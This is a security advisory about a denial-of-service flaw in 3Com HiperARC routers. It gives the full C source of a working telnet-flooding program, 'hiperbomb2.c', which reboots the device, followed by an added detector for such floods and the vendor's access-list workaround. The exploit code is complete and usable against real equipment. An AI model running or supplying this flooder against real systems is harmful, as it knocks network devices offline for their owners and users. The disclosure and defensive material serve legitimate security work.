COMMAND
3COM HiperARC
SYSTEMS AFFECTED
3COM HiperARC 4.0...4.2.29
PROBLEM
Jonathan Chapman found the following. The program below will
reboot a 3Com HiperARC. When the telnet port of a 3Com HiperARC is
flooded using the provided program, the HiperARC unconditionally
reboots. This program is effective over all interfaces, including
a dialup.
/* ---------------------------------------------------------------------
* hiperbomb2.c - Reboots HiperARC faster.
* ---------------------------------------------------------------------
* (c) 1999 - Jonathan Chapman <jchapman@1st.net>
* ---------------------------------------------------------------------
* Sends a high volume of IACs which eventually leads to a reboot of the
* HiperARC. Brief testing indicated that this problem is most likely
* specific to sending IACs rather than any other type of data. Further
* research has shown that specific IAC patterns are more likely to cause
* a reboot. In this example I use one of the most efficient combinations
* I have discovered. Through my testing it usually required at least
* 60,000 packets to cause the HiperARC to reboot.
* ---------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *chassis;
int sockfd, num_of_tries;

/* Resolve the chassis name and open a TCP connection to its telnet port. */
void connect_to_chassis(char *name)
{
    struct hostent *host;
    struct sockaddr_in remote;

    host = gethostbyname(name);
    if(!host) {
        fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0) {
        fprintf(stderr, "Cannot obtain descriptor.\n");
        exit(4);
    }
    remote.sin_family = AF_INET;
    remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
    remote.sin_port = htons(23);
    /* The original ignored the return value of connect(). */
    if(connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)) < 0) {
        fprintf(stderr, "Cannot connect to %s.\n", name);
        exit(5);
    }
    return;
}

/* Write the same 3-byte sequence num_of_tries times. */
void send_iacs()
{
    unsigned char reply[3] = {254, 36, 185};
    int k;

    for(k = 0; k < num_of_tries; k++) {
        write(sockfd, reply, 3);
    }
}

int main(int ac, char **av)
{
    if(ac < 3) {
        fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
        fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
        exit(2);
    }
    chassis = av[1];
    num_of_tries = atoi(av[2]);
    fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
            chassis, num_of_tries);
    connect_to_chassis(chassis);
    send_iacs();
    fprintf(stderr, "Attack complete.\n");
    exit(0);
}
This has been confirmed on 3Com Corporation HiPer Access Router
Card Built on Feb 16 1999 at 12:42:34. System Version: V4.1.59.
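A flood like the one described above shows up on the wire as a long client-to-server stream in which a large share of the bytes fall in telnet's command range (240..255, RFC 854). The following C code is an added example, not part of the original advisory or of 3Com's fix; the thresholds and all struct and function names are assumptions, and the sample buffers are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed thresholds (tune per site): ignore short streams, then flag when
 * at least 1 byte in 4 lies in telnet's command range 240..255 (RFC 854). */
#define MIN_BYTES 4096u
#define CMD_RATIO_DEN 4u

struct telnet_stats { size_t total, cmd_range; };

/* Account for one chunk of client-to-server payload on TCP port 23. */
void stats_update(struct telnet_stats *s, const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] >= 240)
            s->cmd_range++;
    s->total += len;
}

/* 1 = stream looks like a command-byte flood, 0 = not (or too short to tell). */
int stats_suspect(const struct telnet_stats *s)
{
    if (s->total < MIN_BYTES)
        return 0;
    return s->cmd_range * CMD_RATIO_DEN >= s->total;
}

/* Constructed samples: the 3-byte unit from the advisory's reply[] array,
 * an ordinary option negotiation, and a typed command line. */
static const uint8_t page_unit[] = {254, 36, 185};
static const uint8_t negotiate[] = {255, 253, 1, 255, 251, 3};
static const uint8_t typed[] = "list telnet clients\r\n";

/* Feed `unit` to a fresh counter `repeats` times and return the verdict. */
int classify_repeated(const uint8_t *unit, size_t len, size_t repeats)
{
    struct telnet_stats s = {0, 0};
    while (repeats--)
        stats_update(&s, unit, len);
    return stats_suspect(&s);
}
int main(void)
{
    printf("page unit x2000:  %d\n", classify_repeated(page_unit, sizeof page_unit, 2000));
    printf("negotiation x5:   %d\n", classify_repeated(negotiate, sizeof negotiate, 5));
    printf("typed lines x500: %d\n", classify_repeated(typed, sizeof typed - 1, 500));
    return 0;
}
```

Keep one `telnet_stats` per connection and call `stats_update` on each payload chunk seen by a sensor or proxy in front of the chassis; a normal login negotiates a few dozen option bytes and then sends mostly printable text, so it stays below both thresholds.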
SOLUTION
3Com acknowledges and has verified the existence of the hiperbomb
DoS attack. All HiPer ARC software (4.0 - 4.2.29) is vulnerable
to the attack. The following workaround will protect your
equipment until the software patch becomes available. The defect
is logged under 3Com MR#11022. It is possible to add a telnet
access list of trusted hosts on the HiPer ARC. It can be assumed
that the attack will not come from a trusted host. It is also
recommended that you do not allow any telnet sessions from outside
your network. To add a telnet access list:
1) Add telnet clients. These clients may be individual hosts or networks.
"ADD TELNET CLIENT X.X.X.X"
"LIST TELNET CLIENTS" will list all configured clients
2) Enable the telnet client access list feature.
"ENABLE TELNET CLIENT_ACCESS"